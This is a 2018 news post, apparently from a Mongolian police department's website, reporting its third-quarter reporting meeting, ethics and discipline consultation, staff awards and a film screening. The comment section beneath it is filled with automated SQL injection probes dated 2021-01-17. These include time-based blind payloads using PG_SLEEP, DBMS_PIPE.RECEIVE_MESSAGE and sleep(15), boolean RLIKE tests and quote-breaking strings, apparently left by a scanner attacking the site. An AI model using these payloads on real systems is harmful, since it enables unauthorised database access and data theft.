• Нүүр хуудас
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт

Эрүүгийн цагдаагийн албаны 2018 оны III улирлын үйл ажиллагааны тайлангийн хурал, сахилга ёс зүйн зөвлөгөөн боллоо.

2018-10-27
Эрүүгийн цагдаагийн албаны 2018 оны III улирлын үйл ажиллагааны тайлангийн хурал, сахилга ёс зүйн зөвлөгөөн боллоо.

Эрүүгийн цагдаагийн албаны 2018 оны III улирлын үйл ажиллагааны тайлангийн хурал, сахилга ёс зүйн зөвлөгөөн энэ оны 10 дугаар сарын 06-ны өдөр Хууль сахиулах их сургуулийн “Соёлын төв”-д зохион байгуулагдаж алба хаагчдаас ажлын үр дүнгээрээ бусдыгаа хошуучлан ажилласан онцлог алба хаагчдыг шагнах тухай албаны даргын тушаалыг танилцуулж шагнаж урамшуулав.

Тайлангийн хуралтай холбоотой газар, хэлтэс, тасгийн дарга болон алба хаагчдын санал шүүмжлэлийг сонсож алба хаагчдын ажлын үр дүн, үйл ажиллагаа, сахилга ёс зүйтэй холбогдуулан анхаарах асуудлын талаар дэд даргаас үүрэг чиглэл өгсөн.

Мөн арга хэмжээний төгсгөлд Соёлын тэргүүний ажилтан жүжигчин найруулагч Г.Эрдэнэбилэг, Б.Баатар нарын хамтран бүтээсэн “Яллагч” Монголын уран сайхны киног бие бүрэлдэхүүнд үзүүлэв. 

 

ncMUFCMU 1'"
2021-01-17 Хариулах
ncMUFCMU 1����%2527%2522
2021-01-17 Хариулах
ncMUFCMU @@sE0fC
2021-01-17 Хариулах
ncMUFCMU '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-17 Хариулах
ncMUFCMU *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-17 Хариулах
ncMUFCMU setdVMRA')) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU 97pWsSls') OR 191=(SELECT 191 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU 8yoPArVa' OR 306=(SELECT 306 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU -1)) OR 815=(SELECT 815 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU -5) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU -5 OR 418=(SELECT 418 FROM PG_SLEEP(15))--
2021-01-17 Хариулах
ncMUFCMU 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2021-01-17 Хариулах
ncMUFCMU 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2021-01-17 Хариулах
ncMUFCMU if(now()=sysdate(),sleep(15),0)
2021-01-17 Хариулах
ncMUFCMU RLIKE (SELECT (CASE WHEN (294=294) THEN 1 ELSE 0x28 END)) --
2021-01-17 Хариулах
ncMUFCMU 1*
2021-01-17 Хариулах
ncMUFCMU 1*
2021-01-17 Хариулах
ncMUFCMU -1 OR 2+668-668-1=0+0+0+1
2021-01-17 Хариулах
ncMUFCMU -1 OR 3+668-668-1=0+0+0+1
2021-01-17 Хариулах
ncMUFCMU tq9bOfip
2021-01-17 Хариулах
ncMUFCMU 1*
2021-01-17 Хариулах
ncMUFCMU 1*
2021-01-17 Хариулах
ncMUFCMU 1
2021-01-17 Хариулах
ncMUFCMU 1
2021-01-17 Хариулах
ncMUFCMU 1
2021-01-17 Хариулах
ncMUFCMU 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-17 Хариулах
ncMUFCMU 1'"
2021-01-17 Хариулах
ncMUFCMU 1����%2527%2522
2021-01-17 Хариулах
ncMUFCMU @@xfO8O
2021-01-17 Хариулах
ncMUFCMU 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-17 Хариулах